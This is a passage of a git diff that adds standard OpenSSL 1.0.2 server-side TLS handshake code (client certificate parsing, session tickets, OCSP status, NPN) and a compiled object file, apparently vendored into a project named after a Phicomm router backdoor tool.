+    if ((sk = sk_X509_new_null()) == NULL) {
+        SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    n2l3(p, llen);
+    if (llen + 3 != n) {
+        al = SSL_AD_DECODE_ERROR;
+        SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, SSL_R_LENGTH_MISMATCH);
+        goto f_err;
+    }
+    for (nc = 0; nc < llen;) {
+        n2l3(p, l);
+        if ((l + nc + 3) > llen) {
+            al = SSL_AD_DECODE_ERROR;
+            SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,
+                   SSL_R_CERT_LENGTH_MISMATCH);
+            goto f_err;
+        }
+
+        q = p;
+        x = d2i_X509(NULL, &p, l);
+        if (x == NULL) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, ERR_R_ASN1_LIB);
+            goto err;
+        }
+        if (p != (q + l)) {
+            al = SSL_AD_DECODE_ERROR;
+            SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,
+                   SSL_R_CERT_LENGTH_MISMATCH);
+            goto f_err;
+        }
+        if (!sk_X509_push(sk, x)) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        x = NULL;
+        nc += l + 3;
+    }
+
+    if (sk_X509_num(sk) <= 0) {
+        /* TLS does not mind 0 certs returned */
+        if (s->version == SSL3_VERSION) {
+            al = SSL_AD_HANDSHAKE_FAILURE;
+            SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,
+                   SSL_R_NO_CERTIFICATES_RETURNED);
+            goto f_err;
+        }
+        /* Fail for TLS only if we required a certificate */
+        else if ((s->verify_mode & SSL_VERIFY_PEER) &&
+                 (s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT)) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,
+                   SSL_R_PEER_DID_NOT_RETURN_A_CERTIFICATE);
+            al = SSL_AD_HANDSHAKE_FAILURE;
+            goto f_err;
+        }
+        /* No client certificate so digest cached records */
+        if (s->s3->handshake_buffer && !ssl3_digest_cached_records(s)) {
+            al = SSL_AD_INTERNAL_ERROR;
+            goto f_err;
+        }
+    } else {
+        i = ssl_verify_cert_chain(s, sk);
+        if (i <= 0) {
+            al = ssl_verify_alarm_type(s->verify_result);
+            SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE,
+                   SSL_R_CERTIFICATE_VERIFY_FAILED);
+            goto f_err;
+        }
+    }
+
+    if (s->session->peer != NULL) /* This should not be needed */
+        X509_free(s->session->peer);
+    s->session->peer = sk_X509_shift(sk);
+    s->session->verify_result = s->verify_result;
+
+    /*
+     * With the current implementation, sess_cert will always be NULL when we
+     * arrive here.
+     */
+    if (s->session->sess_cert == NULL) {
+        s->session->sess_cert = ssl_sess_cert_new();
+        if (s->session->sess_cert == NULL) {
+            SSLerr(SSL_F_SSL3_GET_CLIENT_CERTIFICATE, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    }
+    if (s->session->sess_cert->cert_chain != NULL)
+        sk_X509_pop_free(s->session->sess_cert->cert_chain, X509_free);
+    s->session->sess_cert->cert_chain = sk;
+    /*
+     * Inconsistency alert: cert_chain does *not* include the peer's own
+     * certificate, while we do include it in s3_clnt.c
+     */
+
+    sk = NULL;
+
+    ret = 1;
+    if (0) {
+ f_err:
+        ssl3_send_alert(s, SSL3_AL_FATAL, al);
+    }
+ err:
+    if (x != NULL)
+        X509_free(x);
+    if (sk != NULL)
+        sk_X509_pop_free(sk, X509_free);
+    return (ret);
+}
+
+int ssl3_send_server_certificate(SSL *s)
+{
+    CERT_PKEY *cpk;
+
+    if (s->state == SSL3_ST_SW_CERT_A) {
+        cpk = ssl_get_server_send_pkey(s);
+        if (cpk == NULL) {
+            /* VRS: allow null cert if auth == KRB5 */
+            if ((s->s3->tmp.new_cipher->algorithm_auth != SSL_aKRB5) ||
+                (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kKRB5)) {
+                SSLerr(SSL_F_SSL3_SEND_SERVER_CERTIFICATE,
+                       ERR_R_INTERNAL_ERROR);
+                return (0);
+            }
+        }
+
+        if (!ssl3_output_cert_chain(s, cpk)) {
+            SSLerr(SSL_F_SSL3_SEND_SERVER_CERTIFICATE, ERR_R_INTERNAL_ERROR);
+            return (0);
+        }
+        s->state = SSL3_ST_SW_CERT_B;
+    }
+
+    /* SSL3_ST_SW_CERT_B */
+    return ssl_do_write(s);
+}
+
+#ifndef OPENSSL_NO_TLSEXT
+/* send a new session ticket (not necessarily for a new session) */
+int ssl3_send_newsession_ticket(SSL *s)
+{
+    if (s->state == SSL3_ST_SW_SESSION_TICKET_A) {
+        unsigned char *p, *senc, *macstart;
+        const unsigned char *const_p;
+        int len, slen_full, slen;
+        SSL_SESSION *sess;
+        unsigned int hlen;
+        EVP_CIPHER_CTX ctx;
+        HMAC_CTX hctx;
+        SSL_CTX *tctx = s->initial_ctx;
+        unsigned char iv[EVP_MAX_IV_LENGTH];
+        unsigned char key_name[16];
+
+        /* get session encoding length */
+        slen_full = i2d_SSL_SESSION(s->session, NULL);
+        /*
+         * Some length values are 16 bits, so forget it if session is too
+         * long
+         */
+        if (slen_full > 0xFF00)
+            return -1;
+        senc = OPENSSL_malloc(slen_full);
+        if (!senc)
+            return -1;
+        p = senc;
+        i2d_SSL_SESSION(s->session, &p);
+
+        /*
+         * create a fresh copy (not shared with other threads) to clean up
+         */
+        const_p = senc;
+        sess = d2i_SSL_SESSION(NULL, &const_p, slen_full);
+        if (sess == NULL) {
+            OPENSSL_free(senc);
+            return -1;
+        }
+        sess->session_id_length = 0; /* ID is irrelevant for the ticket */
+
+        slen = i2d_SSL_SESSION(sess, NULL);
+        if (slen > slen_full) { /* shouldn't ever happen */
+            OPENSSL_free(senc);
+            return -1;
+        }
+        p = senc;
+        i2d_SSL_SESSION(sess, &p);
+        SSL_SESSION_free(sess);
+
+        /*-
+         * Grow buffer if need be: the length calculation is as
+         * follows handshake_header_length +
+         * 4 (ticket lifetime hint) + 2 (ticket length) +
+         * 16 (key name) + max_iv_len (iv length) +
+         * session_length + max_enc_block_size (max encrypted session
+         * length) + max_md_size (HMAC).
+         */
+        if (!BUF_MEM_grow(s->init_buf,
+                          SSL_HM_HEADER_LENGTH(s) + 22 + EVP_MAX_IV_LENGTH +
+                          EVP_MAX_BLOCK_LENGTH + EVP_MAX_MD_SIZE + slen))
+            return -1;
+        p = ssl_handshake_start(s);
+        EVP_CIPHER_CTX_init(&ctx);
+        HMAC_CTX_init(&hctx);
+        /*
+         * Initialize HMAC and cipher contexts. If callback present it does
+         * all the work otherwise use generated values from parent ctx.
+         */
+        if (tctx->tlsext_ticket_key_cb) {
+            if (tctx->tlsext_ticket_key_cb(s, key_name, iv, &ctx,
+                                           &hctx, 1) < 0) {
+                OPENSSL_free(senc);
+                return -1;
+            }
+        } else {
+            RAND_pseudo_bytes(iv, 16);
+            EVP_EncryptInit_ex(&ctx, EVP_aes_128_cbc(), NULL,
+                               tctx->tlsext_tick_aes_key, iv);
+            HMAC_Init_ex(&hctx, tctx->tlsext_tick_hmac_key, 16,
+                         tlsext_tick_md(), NULL);
+            memcpy(key_name, tctx->tlsext_tick_key_name, 16);
+        }
+
+        /*
+         * Ticket lifetime hint (advisory only): We leave this unspecified
+         * for resumed session (for simplicity), and guess that tickets for
+         * new sessions will live as long as their sessions.
+         */
+        l2n(s->hit ? 0 : s->session->timeout, p);
+
+        /* Skip ticket length for now */
+        p += 2;
+        /* Output key name */
+        macstart = p;
+        memcpy(p, key_name, 16);
+        p += 16;
+        /* output IV */
+        memcpy(p, iv, EVP_CIPHER_CTX_iv_length(&ctx));
+        p += EVP_CIPHER_CTX_iv_length(&ctx);
+        /* Encrypt session data */
+        EVP_EncryptUpdate(&ctx, p, &len, senc, slen);
+        p += len;
+        EVP_EncryptFinal(&ctx, p, &len);
+        p += len;
+        EVP_CIPHER_CTX_cleanup(&ctx);
+
+        HMAC_Update(&hctx, macstart, p - macstart);
+        HMAC_Final(&hctx, p, &hlen);
+        HMAC_CTX_cleanup(&hctx);
+
+        p += hlen;
+        /* Now write out lengths: p points to end of data written */
+        /* Total length */
+        len = p - ssl_handshake_start(s);
+        ssl_set_handshake_header(s, SSL3_MT_NEWSESSION_TICKET, len);
+        /* Skip ticket lifetime hint */
+        p = ssl_handshake_start(s) + 4;
+        s2n(len - 6, p);
+        s->state = SSL3_ST_SW_SESSION_TICKET_B;
+        OPENSSL_free(senc);
+    }
+
+    /* SSL3_ST_SW_SESSION_TICKET_B */
+    return ssl_do_write(s);
+}
+
+int ssl3_send_cert_status(SSL *s)
+{
+    if (s->state == SSL3_ST_SW_CERT_STATUS_A) {
+        unsigned char *p;
+        /*-
+         * Grow buffer if need be: the length calculation is as
+         * follows 1 (message type) + 3 (message length) +
+         * 1 (ocsp response type) + 3 (ocsp response length)
+         * + (ocsp response)
+         */
+        if (!BUF_MEM_grow(s->init_buf, 8 + s->tlsext_ocsp_resplen))
+            return -1;
+
+        p = (unsigned char *)s->init_buf->data;
+
+        /* do the header */
+        *(p++) = SSL3_MT_CERTIFICATE_STATUS;
+        /* message length */
+        l2n3(s->tlsext_ocsp_resplen + 4, p);
+        /* status type */
+        *(p++) = s->tlsext_status_type;
+        /* length of OCSP response */
+        l2n3(s->tlsext_ocsp_resplen, p);
+        /* actual response */
+        memcpy(p, s->tlsext_ocsp_resp, s->tlsext_ocsp_resplen);
+        /* number of bytes to write */
+        s->init_num = 8 + s->tlsext_ocsp_resplen;
+        s->state = SSL3_ST_SW_CERT_STATUS_B;
+        s->init_off = 0;
+    }
+
+    /* SSL3_ST_SW_CERT_STATUS_B */
+    return (ssl3_do_write(s, SSL3_RT_HANDSHAKE));
+}
+
+# ifndef OPENSSL_NO_NEXTPROTONEG
+/*
+ * ssl3_get_next_proto reads a Next Protocol Negotiation handshake message.
+ * It sets the next_proto member in s if found
+ */
+int ssl3_get_next_proto(SSL *s)
+{
+    int ok;
+    int proto_len, padding_len;
+    long n;
+    const unsigned char *p;
+
+    /*
+     * Clients cannot send a NextProtocol message if we didn't see the
+     * extension in their ClientHello
+     */
+    if (!s->s3->next_proto_neg_seen) {
+        SSLerr(SSL_F_SSL3_GET_NEXT_PROTO,
+               SSL_R_GOT_NEXT_PROTO_WITHOUT_EXTENSION);
+        return -1;
+    }
+
+    /* See the payload format below */
+    n = s->method->ssl_get_message(s,
+                                   SSL3_ST_SR_NEXT_PROTO_A,
+                                   SSL3_ST_SR_NEXT_PROTO_B,
+                                   SSL3_MT_NEXT_PROTO, 514, &ok);
+
+    if (!ok)
+        return ((int)n);
+
+    /*
+     * s->state doesn't reflect whether ChangeCipherSpec has been received in
+     * this handshake, but s->s3->change_cipher_spec does (will be reset by
+     * ssl3_get_finished).
+     */
+    if (!s->s3->change_cipher_spec) {
+        SSLerr(SSL_F_SSL3_GET_NEXT_PROTO, SSL_R_GOT_NEXT_PROTO_BEFORE_A_CCS);
+        return -1;
+    }
+
+    if (n < 2)
+        return 0;               /* The body must be > 1 bytes long */
+
+    p = (unsigned char *)s->init_msg;
+
+    /*-
+     * The payload looks like:
+     *   uint8 proto_len;
+     *   uint8 proto[proto_len];
+     *   uint8 padding_len;
+     *   uint8 padding[padding_len];
+     */
+    proto_len = p[0];
+    if (proto_len + 2 > s->init_num)
+        return 0;
+    padding_len = p[proto_len + 1];
+    if (proto_len + padding_len + 2 != s->init_num)
+        return 0;
+
+    s->next_proto_negotiated = OPENSSL_malloc(proto_len);
+    if (!s->next_proto_negotiated) {
+        SSLerr(SSL_F_SSL3_GET_NEXT_PROTO, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    memcpy(s->next_proto_negotiated, p + 1, proto_len);
+    s->next_proto_negotiated_len = proto_len;
+
+    return 1;
+}
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_srvr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_srvr.o
new file mode 100644
index 0000000000000000000000000000000000000000..0d36f5489c487a27fac6bcd521884d16b35428e1
GIT binary patch
literal 31024
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
